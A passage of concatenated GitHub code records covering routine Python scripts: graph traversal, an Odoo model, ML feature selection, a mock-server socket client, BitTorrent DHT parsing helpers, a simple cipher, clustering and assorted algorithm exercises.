visited[v] = True\r\n graph[v].sort()\r\n res1.append(v)\r\n for x in graph[v]:\r\n if visited[x] == False:\r\n dfs(x, visited)\r\n\r\n\r\ndef bfs(v, visited):\r\n dq = deque([v])\r\n visited[v] = True\r\n\r\n while dq:\r\n cur = dq.popleft()\r\n res2.append(cur)\r\n graph[cur].sort()\r\n\r\n for x in graph[cur]:\r\n if visited[x] == False:\r\n dq.append(x)\r\n visited[x] = True\r\n\r\n\r\nres1 = []\r\n\r\ndfs(r, visited)\r\n\r\nvisited = [False] * (n + 1)\r\nres2 = []\r\n\r\nbfs(r, visited)\r\n\r\nfor x in res1:\r\n print(x, end=' ')\r\nprint()\r\nfor x in res2:\r\n print(x, end=' ')\r\n","repo_name":"dongjun-Yi/Algorithm","sub_path":"백준/Silver/1260. DFS와 BFS/DFS와 BFS.py","file_name":"DFS와 BFS.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34397278078","text":"# -*- coding: utf-8 -*-\n\nimport itertools\nimport psycopg2\n\nimport odoo.addons.decimal_precision as dp\nfrom odoo import api, fields, models, tools, _\nfrom odoo.exceptions import ValidationError, except_orm\n\nclass ProductTemplate (models.Model):\n _inherit = 'product.template'\n\n product_bundle_list = fields.One2many('product.bundle.line','product_bundle', string='Product Bundle', copy=True)\n bundle_okay = fields.Boolean('Bundle',default=False)\n amount_untaxed = fields.Monetary(string='Untaxed Amount', store=True, readonly=True, compute='_amount_all', track_visibility='always')\n amount_tax = fields.Monetary(string='Taxes', store=True, readonly=True, compute='_amount_all', track_visibility='always')\n amount_total = fields.Monetary(string='Total', store=True, readonly=True, compute='_amount_all', track_visibility='always')\n amount_cost = fields.Monetary(string='Cost', store=True, readonly=True, compute='_amount_all', track_visibility='always')\n\n @api.depends('product_bundle_list.price_total')\n def _amount_all(self):\n\n for product in self:\n amount_untaxed = amount_tax = amount_cost =0.0\n for line in product.product_bundle_list:\n amount_untaxed += line.price_subtotal\n amount_tax += line.price_tax\n amount_cost +=line.product_id.standard_price\n product.update({\n 'amount_untaxed': amount_untaxed,\n 'amount_tax': amount_tax,\n 'amount_total': amount_untaxed + amount_tax,\n 'list_price': amount_untaxed + amount_tax,\n 'standard_price': amount_cost\n })\n\n @api.multi\n @api.onchange('bundle_okay')\n def untick_purchase(self):\n \tif self.bundle_okay == True:\n \t\tself.purchase_ok = False\n","repo_name":"rieki/odoo","sub_path":"product_bundle/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36641986415","text":"from time import time\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\n\nfrom cal_scores.wodeutil.nlp.metrics.eval_constants import *\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.svm import SVR\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.feature_selection import SelectFromModel, RFECV\nfrom mlxtend.feature_selection import SequentialFeatureSelector as mlxtend_SFS\nfrom sklearn.feature_selection import SequentialFeatureSelector as sklearn_SFS\nfrom models.models import regr_dict, regr_dict_regularized\n\n\ndef get_features_filter_method(df, corr_type='pearson', use_abs=True, include_labels=False):\n \"\"\"\n get features sorted by their absolute correlation value\n \"\"\"\n corr_matrix = df.corr(method=corr_type)\n against = \"coherence\"\n excludes = ['coherence', 'relevance', 'fluency', 'consistency', 'line_id', 'doc_id']\n if use_abs:\n feature_corrs = corr_matrix[against].abs().sort_values(ascending=False)\n else:\n feature_corrs = corr_matrix[against].sort_values(ascending=False)\n # if not include_labels:\n # feature_corrs = feature_corrs[~summeval_labels].copy()\n # scatter_matrix(df_abs[attr], figsize=(12, 10))\n # df_mix_path.plot(kind=\"scatter\", x=\"density\", y=\"coherence\")\n # plt.show()\n\n\ndef get_features_mlxtend_sfs(df_metrics, df_label):\n sfs_stats = defaultdict(set)\n num_of_features = 20\n # use_regr = [regr_forest, regr_lin, regr_lasso, regr_grad_boost, regr_adaboost, regr_lin_svr]\n use_regr = []\n subset_list = []\n curr_dict = {regr_forest: regr_dict_regularized[regr_forest],\n regr_lin: regr_dict_regularized[regr_lin],\n regr_bagging: regr_dict_regularized[regr_bagging],\n regr_mlp: regr_dict_regularized[regr_mlp],\n regr_adaboost: regr_dict_regularized[regr_adaboost],\n regr_voting: regr_dict_regularized[regr_voting],\n regr_grad_boost: regr_dict_regularized[regr_grad_boost]\n }\n # curr_dict = regr_dict_regularized\n for regr_name, regressor in curr_dict.items():\n if regr_name in use_regr or len(\n use_regr) == 0: # (set use_regr to empty lsit) len(use_regr) ==0 when use all regressors\n sfs = mlxtend_SFS(regressor,\n k_features=num_of_features,\n forward=True,\n floating=False,\n scoring='r2',\n cv=5,\n n_jobs=-1)\n sfs = sfs.fit(df_metrics, df_label)\n features = set(sfs.k_feature_names_)\n sfs_stats[regr_name] = features\n subset_list.append(sfs.subsets_)\n print(sfs_stats)\n\n\ndef min_max_scale(df_metrics, save_to):\n scaler = MinMaxScaler()\n mix_minmax = scaler.fit_transform(df_metrics)\n df_min_minmax = pd.DataFrame(mix_minmax, columns=df_metrics.columns)\n print(f\"len of df_min_minmax: {len(df_min_minmax)}\")\n df_min_minmax.to_csv(save_to, index=False)\n\n\ndef get_selected_features(df_metrics, df_label):\n lasso = LassoCV().fit(df_metrics, df_label)\n importance = np.abs(lasso.coef_)\n features_names = np.array(df_metrics.columns.values.tolist())\n print(f\"feature names: {features_names}\")\n print(f\"and their importance: {importance} with len {len(importance)}\")\n\n threshold = np.sort(importance)[-1] + 0.0001\n tic = time()\n sfm = SelectFromModel(lasso, threshold=threshold).fit(df_metrics, df_label)\n toc = time()\n print(f\"features seleted by SelectFromModel: {features_names[sfm.get_support()]}\")\n print(f\"done in {toc - tic:.3f}s\")\n\n\ndef sequential_feature_selector(df_metrics, df_label):\n forest = RandomForestRegressor()\n lasso = LassoCV().fit(df_metrics, df_label)\n # importance = np.abs(lasso.coef_)\n features_names = np.array(df_metrics.columns.values.tolist())\n sfs_fw = sklearn_SFS(forest, n_features_to_select=10, direction='forward', n_jobs=-1).fit(df_metrics, df_label)\n print(f\"features selected by sfs_fw: {features_names[sfs_fw.get_support()]}\")\n # sfs_bw = SequentialFeatureSelector(lasso, n_features_to_select=30, direction='backward').fit(df_metrics, df_label)\n # print(f\"features selected sfs_bw: {features_names[sfs_bw.get_support()]}\")\n\n\ndef RFECV_feature_selection(df_metrics, df_label):\n forest = RandomForestRegressor(n_jobs=-1)\n forest = SVR(kernel='linear')\n rfecv = RFECV(estimator=forest, step=1, n_jobs=-1, min_features_to_select=5, cv=5)\n rfecv.fit(df_metrics, df_label)\n print(f\"optimal number of eatures: {rfecv.n_features_}\")\n\n print(f\"scores: {rfecv.grid_scores_}\")\n plt.figure()\n plt.xlabel(\"Number of features selected\")\n plt.ylabel(\"Cross validation score\")\n plt.plot(range(5,\n len(rfecv.grid_scores_) + 5),\n rfecv.grid_scores_)\n plt.show()\n\n\nif __name__ == '__main__':\n get_features_filter_method(include_labels=True)\n","repo_name":"bzhao2718/ReliableSummEvalReg","sub_path":"models/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38343169319","text":"import csv\n\nall_tokens_file = '../data/train/all_tokens.csv'\nchars_file = '../data/analysis/chars2.csv'\n\nwith open(all_tokens_file, mode='r', encoding='utf8') as af:\n reader = csv.reader(af)\n titles = next(reader)\n\n chars = {}\n\n counter = 0\n for (sentence_id, token_id, class_name, str_before, str_after) in reader:\n sentence_id = int(sentence_id)\n token_id = int(token_id)\n\n counter += 1\n if counter % 100000 == 0:\n print(' processing data row %d' % counter)\n\n # skip strings with \"sil\", we don't know which one character is \"sil\"\n if 'sil' in str_after:\n continue\n\n # skip unchanged single characters or strings\n if len(str_before) == 1 and str_before == str_after:\n continue\n\n for char in str_before:\n if char not in chars:\n chars[char] = 1\n else:\n chars[char] += 1\n\n chars = sorted(list(chars.items()), key=lambda x: x[1], reverse=True)\n\nprint('Writing the file')\n\nwith open(chars_file, mode='w', encoding='utf8') as nf:\n writer = csv.writer(nf, quoting=csv.QUOTE_NONNUMERIC, lineterminator='\\n')\n writer.writerow(('char', 'count'))\n writer.writerows(chars)\n","repo_name":"apls777/text-normalization-token-classes","sub_path":"text_norm/data_analysis/chars2.py","file_name":"chars2.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1346184380","text":"import pathlib\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\n\r\nclass Net(nn.Module):\r\n def __init__(self, in_units, out_units):\r\n super(Net, self).__init__()\r\n self.l1 = nn.Linear(in_units, out_units)\r\n\r\n def forward(self, x):\r\n y = self.l1(x)\r\n return y\r\n\r\n# データ準備\r\nfolder_path = pathlib.Path(__file__).resolve().parent\r\nX_train = pd.read_csv(folder_path / \"X_train.csv\", header=None)\r\nX_train = torch.from_numpy(X_train.values.astype(np.float32))\r\ny_train = pd.read_csv(folder_path / \"y_train.csv\", header=None)\r\ny_train = torch.tensor(y_train[0].to_list())\r\n\r\nx = X_train[0:4]\r\ny = y_train[0:4]\r\n\r\nnet = Net(x.size()[1], 4)\r\noptimizer = optim.SGD(net.parameters(), lr=0.01)\r\ncriterion = nn.CrossEntropyLoss()\r\n\r\nfor i in range(100):\r\n optimizer.zero_grad()\r\n output = net(x)\r\n loss = criterion(output, y)\r\n loss.backward()\r\n optimizer.step()\r\n","repo_name":"oooto/nlp100","sub_path":"第8章_ニューラルネット/ans73.py","file_name":"ans73.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22738371716","text":"from sqlalchemy.orm import Session\nfrom sqlalchemy import func\n\nimport models, schemas\n\nfrom datetime import datetime, timedelta\n\n\ndef create_measurement_and_configuration(db: Session, response: schemas.UM34CResponse):\n data = response.dict()\n for i, val in enumerate(data['group_data']):\n data.update({'group'+str(i)+'_mah': val['mah']})\n data.update({'group'+str(i)+'_mwh': val['mwh']})\n create_device(db, schemas.DeviceCreate(**{key: data[key] for key in schemas.DeviceCreate.schema()['properties'].keys()}))\n create_measurement(db, schemas.MeasurementCreate(**{key: data[key] for key in schemas.MeasurementCreate.schema()['properties'].keys()}))\n create_configuration(db, schemas.ConfigurationCreate(**{key: data[key] for key in schemas.ConfigurationCreate.schema()['properties'].keys()}))\n return {'created_id': db.query(func.max(models.Measurement.id)).first()[0]}\n\n\ndef get_all_devices(db: Session):\n return db.query(models.Device).offset(0).limit(5).all()\n\n\ndef get_all_configurations(db: Session):\n return db.query(models.Configuration).all()\n\n\ndef get_measurements_by_limit(db: Session, limit: int):\n offset = db.query(func.max(models.Measurement.id)).first()[0] - limit\n offset = offset if offset >= 0 else 0\n resp = db.query(models.Measurement).offset(offset).limit(limit).all()\n return resp\n\n\ndef get_measurements_by_hours(db: Session, hours: int):\n time_delta = datetime.now() - timedelta(hours=hours)\n time_delta = time_delta.replace(minute=0, second=0, microsecond=0)\n resp = db.query(models.Measurement).filter(models.Measurement.created_at > time_delta).all()\n return resp\n\n\ndef create_device(db: Session, device: schemas.DeviceCreate):\n if device.bd_address not in [device.bd_address for device in get_all_devices(db)]:\n db_device_data = models.Device(**device.dict())\n db.add(db_device_data)\n db.commit()\n db.refresh(db_device_data)\n\n\ndef create_measurement(db: Session, measurement: schemas.MeasurementCreate):\n db_measurement_data = models.Measurement(**measurement.dict())\n db.add(db_measurement_data)\n db.commit()\n db.refresh(db_measurement_data)\n\n\ndef create_configuration(db: Session, configuration: schemas.ConfigurationCreate):\n if configuration.bd_address not in [configs.bd_address for configs in get_all_configurations(db)]:\n db_configuration_data = models.Configuration(**configuration.dict())\n db.add(db_configuration_data)\n db.commit()\n db.refresh(db_configuration_data)\n else:\n db.query(models.Configuration).filter(models.Configuration.bd_address == configuration.bd_address).update(configuration.dict(), synchronize_session=\"fetch\")\n db.commit()\n","repo_name":"S3nsu1k4n/um34c_visualization","sub_path":"db_app/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"17601749292","text":"# Create an ImageJ gateway with the newest available version of ImageJ.\nimport imagej\nij = imagej.init()\n\n# Load an image.\nimage_url = 'https://i.picsum.photos/id/237/200/300.jpg?hmac=TmmQSbShHz9CdQm0NkEjx1Dyh_Y984R9LpNrpvH2D_U'\njimage = ij.io().open(image_url)\n\n# Convert the image from ImageJ to xarray, a package that adds\n# labeled datasets to numpy (http://xarray.pydata.org/en/stable/).\nimage = ij.py.from_java(jimage)\n\n# Display the image (backed by matplotlib).\nij.py.show(image, cmap='gray')","repo_name":"torbensky/python-imagej-starter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19918030281","text":"import json\nimport socket\n\nimport requests\n\nfrom settings import MOCK_PORT, MOCK_HOST\n\nurl = f'http://{MOCK_PORT}:{MOCK_HOST}'\n\n\nclass SocketClient:\n\n def client_connecttion(self, host, port):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.settimeout(0.1)\n client.connect((host, port))\n return client\n\n def listener(self, client):\n total_data = []\n try:\n while True:\n data = client.recv(4096)\n if data:\n print(f'received data: {data}')\n total_data.append(data.decode())\n else:\n break\n except socket.timeout as e:\n print(e)\n finally:\n client.close()\n return ''.join(total_data).splitlines()\n\n def client_get(self, user):\n params = f'/get_login_status/{user}'\n client = self.client_connecttion(MOCK_HOST, int(MOCK_PORT))\n\n request = f'GET {params} HTTP/1.1\\r\\nHost:{MOCK_HOST}\\r\\n\\r\\n'\n client.send(request.encode())\n\n data = self.listener(client)\n return data\n\n def client_delete(self, user):\n params = f'/delete_user/{user}'\n client = self.client_connecttion(MOCK_HOST, int(MOCK_PORT))\n request = f'DELETE {params} HTTP/1.1\\r\\nHost:{MOCK_HOST}\\r\\n\\r\\n'\n client.send(request.encode())\n data = self.listener(client)\n return data\n\n def client_post(self, name):\n headers = {'Content-Type': 'application/json'}\n data = json.dumps({'name': name})\n\n return requests.post('http://127.0.0.1:1234/post_new_user_status', headers=headers, data=data)\n\n def client_put(self, name, status):\n headers = {'Content-Type': 'application/json'}\n data = json.dumps({'name': name, 'status': status})\n return requests.put('http://127.0.0.1:1234/change_status_user', headers=headers, data=data)\n","repo_name":"Shavragin/GUI_API_DB_TESTING","sub_path":"Mock_Homework_07/client/client_mock.py","file_name":"client_mock.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33695583688","text":"# Grigoriev, 451\n###################\nimport math\npreps = [' ', ',', ';', '.', '!', '?']\ncoded = dict()\ndecoded = dict()\n###################\n\n\ndef create_alphabet():\n alphabet = [chr(x) for x in range(ord('а'), ord('я') + 1)] + [\n chr(x) for x in range(ord('0'), ord('9') + 1)] + [x for x in preps]\n max_square = math.ceil(math.sqrt(len(alphabet)))\n for i in range(max_square):\n for j in range(max_square):\n index = i * max_square + j\n if (index >= len(alphabet)):\n break\n coded[alphabet[index]] = str(i) + str(j)\n decoded[str(i) + str(j)] = alphabet[index]\n\n\ndef encode_file(filename):\n f = open(filename, 'r', encoding='utf-8')\n # fw = open(\"task4_res.txt\", 'w', encoding='utf-8')\n answer = \"\"\n for row in f:\n for symbol in row:\n if (symbol == '\\n'):\n continue\n answer = answer + coded[symbol] + ' '\n answer = answer + '\\n'\n return answer\n\n\ndef decode_file(filename):\n f = open(filename, 'r', encoding='utf-8')\n # fw = open(\"task4_res.txt\", 'w', encoding='utf-8')\n answer = \"\"\n for row in f:\n for numbers in row.split():\n if (numbers == '\\n'):\n continue\n answer = answer + decoded[numbers]\n answer = answer + '\\n'\n return answer\n\n\ncreate_alphabet()\nprint(encode_file(\"task4.txt\"))\nprint(decode_file(\"task4_en.txt\"))\n","repo_name":"Alexflames/water","sub_path":"protection/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27114522893","text":"__author__ = 'dwb'\n\n\nimport logging\nimport logging.handlers\nfrom hashlib import sha1\nfrom random import randint\nfrom struct import unpack, pack\nfrom socket import inet_aton, inet_ntoa\nfrom threading import Timer, Thread\n\nstdger = logging.getLogger(\"std_log\")\nfileger = logging.getLogger(\"file_log\")\n\ndef initialLog():\n\n stdLogLevel = logging.DEBUG\n fileLogLevel = logging.DEBUG\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n stdout_handler = logging.StreamHandler()\n stdout_handler.setFormatter(formatter)\n\n file_handler = logging.handlers.RotatingFileHandler(\"HASH.log\", maxBytes=1024*1024*20, backupCount=10000)\n file_handler.setFormatter(formatter)\n\n peer_handler = logging.handlers.RotatingFileHandler(\"PEER.log\", maxBytes=1024*1024*20, backupCount=10000)\n peer_handler.setFormatter(formatter)\n\n logging.getLogger(\"file_log\").setLevel(fileLogLevel)\n logging.getLogger(\"file_log\").addHandler(file_handler)\n\n logging.getLogger(\"std_log\").setLevel(stdLogLevel)\n logging.getLogger(\"std_log\").addHandler(stdout_handler)\n\n logging.getLogger(\"peer_log\").setLevel(fileLogLevel)\n logging.getLogger(\"peer_log\").addHandler(peer_handler)\n\n\ndef entropy(length):\n chars = []\n for i in range(length):\n chars.append(chr(randint(0, 255)))\n return \"\".join(chars)\n\ndef random_id():\n hash = sha1()\n hash.update(entropy(20))\n return hash.digest()\n\ndef decode_nodes(nodes):\n n = []\n length = len(nodes)\n if (length % 26) != 0:\n return n\n\n for i in range(0, length, 26):\n nid = nodes[i:i+20]\n ip = inet_ntoa(nodes[i+20:i+24])\n port = unpack(\"!H\", nodes[i+24:i+26])[0]\n n.append((nid, ip, port))\n return n\n\ndef decode_values(values):\n\n n=[]\n for i in values:\n\n stdger.debug(\"the length of value %d\"%len(i))\n if len(i)!=6:\n continue\n ip = inet_ntoa(i[0:4])\n port = unpack(\"!H\", i[4:6])[0]\n n.append((ip,port))\n return n\n\ndef timer(t, f):\n Timer(t, f).start()\n\ndef get_neighbor(target, end=10):\n\n return target[:end]+random_id()[end:]","repo_name":"NanYoMy/GetInfo","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"11679168311","text":"# O(n^2) time | O(n) space\ndef threeNumberSum(array, targetSum):\n # Sort array\n array.sort()\n\n output = []\n\n for i in range(len(array)):\n print(\"Loop: \", i)\n current = array[i]\n left = i+1\n right = len(array) - 1\n\n if current >= targetSum:\n break\n\n while left < right:\n currentSum = current + array[left] + array[right]\n\n if currentSum > targetSum:\n print(\"Greater\")\n right -= 1\n print(\"right: \", right)\n elif currentSum < targetSum:\n print(\"Less\")\n left += 1\n print(\"left: \", left)\n else:\n print(\"3\")\n output.append([current, array[left], array[right]])\n right -= 1\n left += 1\n\n return output\n","repo_name":"kawaharm/algoexpert","sub_path":"array/threeNumberSum.py","file_name":"threeNumberSum.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20095013545","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModule for storing basic data structures of mock data for testing.\n\"\"\"\nmock_customer_data = {\n \"id\": \"1b2f7b83-7b4d-441d-a210-afaa970e5b76\",\n \"data\": {\n \"SUBSCRIPTION\": \"basic\",\n \"CREATION_DATE\": \"2013-03-10T02:00:00Z\",\n \"LAST_PAYMENT_DATE\": \"2020-01-10T09:25:00Z\",\n \"theme_name\": \"Tropical Island\",\n \"ENABLED_FEATURES\": {\n \"CERTIFICATES_INSTRUCTOR_GENERATION\": True,\n \"INSTRUCTOR_BACKGROUND_TASKS\": True,\n \"ENABLE_COURSEWARE_SEARCH\": True,\n \"ENABLE_COURSE_DISCOVERY\": True,\n \"ENABLE_DASHBOARD_SEARCH\": True,\n \"ENABLE_EDXNOTES\": True,\n },\n \"language_code\": \"en\",\n \"banner_message\": \"

Welcome to Mr X's website

\",\n \"displayed_timezone\": \"America/Bogota\",\n \"user_profile_image\": \"https://i.imgur.com/LMhM8nn.jpg\",\n \"user_email\": \"barack@aol.com\",\n },\n}\n\nmock_manager_arguments = {\n \"new_subscription\": \"basic\",\n \"customer_id\": \"9f5c5a5f-4f4c-4a4c-a5f5-5c5f9f4f4c4a\",\n \"customer_data_api_url\": \"http://localhost:8010/api/v1/customerdata/\",\n \"subscriptions\": {\"free\": 1, \"basic\": 2, \"premium\": 3},\n}\n\nsubscription_levels = {\n \"low_subscription\": 1,\n \"mid_subscription\": 2,\n \"high_subscription\": 3,\n}\n\nsubscription_manager_attributes = [\n \"customer_id\",\n \"new_subscription\",\n \"customer_data_api_url\",\n \"subscriptions\",\n \"customer_data\",\n \"old_subscription\",\n \"changes_sent\",\n \"exit_code\",\n]\n","repo_name":"CristianHdz90/subscription_manager","sub_path":"02_your_code/subscription_manager_base/subscription_manager/tests/mocks/mock_data.py","file_name":"mock_data.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18882461155","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('event_category/', views.EventCategoryPage, name='event_category'),\n path('event/', views.EventPage, name='events'),\n path('event_image/', views.EventImagePage, name='event_image'),\n path('event_member/', views.EventMemberPage, name='event_member'),\n \n]","repo_name":"ak21shuklaa/Membership-Management-System","sub_path":"FYP-master/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11550223250","text":"import torch\nimport torch.nn as nn\n\n\nclass CouplingLayer(nn.Module):\n def __init__(self, d, swap=False, w_init_sigma=0.001, intermediate_dim=64):\n nn.Module.__init__(self)\n self.d = d - (d // 2)\n self.swap = swap\n self.net_s_t = nn.Sequential(\n nn.Linear(self.d, intermediate_dim),\n nn.ReLU(inplace=True),\n #nn.BatchNorm1d(intermediate_dim),\n nn.Linear(intermediate_dim, intermediate_dim),\n nn.ReLU(inplace=True),\n nn.BatchNorm1d(intermediate_dim),\n nn.Linear(intermediate_dim, (d - self.d) * 2),\n )\n\n def forward(self, x, logpx=None, reverse=False):\n ''' swap: which part should be operated with; dim has to bee an even number '''\n if self.swap:\n x = torch.cat([x[:, self.d:], x[:, :self.d]], 1)\n\n in_dim = self.d\n out_dim = x.shape[1] - self.d\n epsilon = 1.0E-10\n s_t = self.net_s_t(x[:, :in_dim]) ## size: 2*(x.shape[1] - self.d)\n scale = torch.sigmoid(s_t[:, :out_dim] + 2.) + epsilon\n shift = s_t[:, out_dim:]\n\n ## [batch_size, 1]\n logdetjac = torch.sum(torch.log(scale).view(scale.shape[0], -1), dim=1, keepdim=False)\n\n if not reverse:\n y1 = x[:, self.d:] * scale + shift\n delta_logp = -logdetjac\n else:\n y1 = (x[:, self.d:] - shift) / scale\n delta_logp = logdetjac\n\n y = torch.cat([x[:, :self.d], y1], 1) if not self.swap else torch.cat([y1, x[:, :self.d]], 1)\n if logpx is None:\n return y, None, delta_logp\n else:\n logpx = torch.squeeze(logpx)\n delta_logp = torch.squeeze(delta_logp)\n if torch.cuda.is_available():\n delta_logp = delta_logp.cuda()\n logpx = logpx.cuda()\n else:\n delta_logp = delta_logp\n logpx = logpx\n return y, logpx + delta_logp, delta_logp\n\n","repo_name":"ShaogangRen/EFRE","sub_path":"utils/layers/coupling.py","file_name":"coupling.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12610914277","text":"#!/usr/bin/env python\n\n\"\"\"\nhierarchical.py: module is deddicated to run different hierarchical algorithms.\n\n Hierarchical clustering algorithms [23] were developed to overcome some of the disadvantages\n associated with flat or partitional-based clustering methods. Hierarchical algorithms were \n developed to build a more deterministic and flexible mechanism for clustering the data objects. \n Hierarchical methods can be categorized into agglomerative and divisive clustering methods.\n Agglomerativemethods start by taking singleton clusters (that contain only one data object per \n cluster) at the bottom level and continue merging two clusters at a time to build a bottom-up\n hierarchy of the clusters. Divisive methods, on the other hand, start with all the data objects\n in a huge macro-cluster and split it continuously into two groups generating a top-down\n hierarchy of clusters.\n - agglomerative (here only this algoritm with different linkage function is in operation)\n\"\"\"\n\n__author__ = \"Chakraborty, S.\"\n__copyright__ = \"Copyright 2020, SuperDARN@VT\"\n__credits__ = []\n__license__ = \"MIT\"\n__version__ = \"1.0.\"\n__maintainer__ = \"Chakraborty, S.\"\n__email__ = \"shibaji7@vt.edu\"\n__status__ = \"Research\"\n\n\nimport numpy as np\n\nfrom sklearn.cluster import AgglomerativeClustering, FeatureAgglomeration\n\nclass Hierarchi(object):\n \"\"\"All hierarchical algorithms are implemened here.\"\"\"\n\n def __init__(self, method, data, n_clusters=2, random_state=0):\n \"\"\"\n Initialize all the parameters.\n method: Name of the algorithms (lower case joined by underscore)\n data: Data (2D Matrix)\n n_clusters: Number of clusters\n random_state: Random initial state\n \"\"\"\n self.method = method\n self.data = data\n self.n_clusters = n_clusters\n np.random.seed(random_state)\n\n self.affinity = \"euclidean\"\n self.linkage = \"ward\"\n self.distance_threshold = None\n return\n\n def setup(self, keywords={}):\n \"\"\"\n Setup the algorithms\n \"\"\"\n for p in keywords.keys():\n setattr(self, p, keywords[p])\n\n if self.method == \"agglomerative\": self.obj = AgglomerativeClustering(n_clusters=self.n_clusters, linkage=self.linkage, \n affinity=self.affinity)\n if self.method == \"feature\": self.obj = FeatureAgglomeration(n_clusters=self.n_clusters, linkage=self.linkage,\n affinity=self.affinity, distance_threshold=self.distance_threshold)\n return\n\n def run(self):\n \"\"\"\n Run the models\n \"\"\"\n if self.method == \"agglomerative\": self.obj.fit(self.data)\n if self.method == \"feature\": self.obj.fit(self.data)\n return\n","repo_name":"shibaji7/SuperDARN-Clustering","sub_path":"sd/algorithms/hierarchical.py","file_name":"hierarchical.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35688365099","text":"# меню\n# ввод\n# расчет\n# вывод\n\ndef menu():\n # выводим меню програмки\n print('- - - - МЕНЮ - - - -\\n',\n '1. Расчитать з/п сотрудника\\n'\n ' 2. Выход из программы\\n'\n '- - - - ---- - - - -')\n return input('Выберите действие: ')\n\n\ndef entry():\n # собираем данные о сотруднике/сотрудниках\n data = {\n 'Выработка в часах': int(input('Введите объем выработки в часах: ')),\n 'Ставка в час': int(input('Введите ставку в час ($): ')),\n 'Премия в %': int(input('Введите объем премии в процентах: ')),\n 'Кол-во сотрудников': int(input('Введите количество сотрудников: '))\n }\n return data\n\n\ndef my_counter(data):\n # проводим нехитрые калькуляции з/п\n data_list = []\n res = 1\n for el in data.values():\n data_list.append(el)\n if data_list[0] < 140:\n print('Премия не начилена')\n data_list.pop(2)\n else:\n data_list[2] = (data_list[2] / 100) + 1\n for el in data_list:\n res *= el\n res = float('{:.3f}'.format(res))\n return res\n\n\ndef results(data, res, num):\n # выводим результаты\n print('Ваши данные: \\n'\n f'{data}')\n print('Результат рассчета: \\n'\n f'${res} на {num} сотрудника/сотрудников')\n\n\ndef main():\n # заставляем все работать в команде\n choice = 0\n while True:\n choice = int(menu())\n if choice == 1:\n data = entry()\n result = my_counter(data)\n num = data.setdefault('Кол-во сотрудников')\n results(data, result, num)\n elif choice == 2:\n print('Программа завершена')\n break\n else:\n print('Выберите действие: ')\n\n\nmain()\n","repo_name":"yuriyhryshman/gb_python","sub_path":"lesson_4/python1.py","file_name":"python1.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8802654474","text":"# 2018-12-08\n\nclass Solution(object):\n def deleteDuplicates(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return head\n \n dummy = pre = ListNode(0)\n dummy.next = head\n \n # we must need this head because \n while head and head.next:\n if head.val != head.next.val:\n pre = pre.next\n head = head.next\n else:\n while head.next and head.val == head.next.val:\n head = head.next\n head = head.next\n pre.next = head\n \n \n return dummy.next","repo_name":"RioAraki/leetcode2020","sub_path":"leetcode_python/82_RemoveDuplicatesfromSortedListII.py","file_name":"82_RemoveDuplicatesfromSortedListII.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29391384544","text":"import cv2\nfrom torch.utils.data import Dataset\nfrom tools.mots_tools.io import *\nimport torch\nfrom roi_align import RoIAlign\nimport torchvision\nimport matplotlib.pyplot as plt\nfrom torchvision import transforms\nimport random\n\ndef format_box(bbox):\n return torch.Tensor([[bbox[0], bbox[1], bbox[0]+ bbox[2], bbox[1] + bbox[3]]])\n\ndef pass_box(bbox):\n return torch.Tensor([bbox[0], bbox[1], bbox[2], bbox[3]])\n\nclass 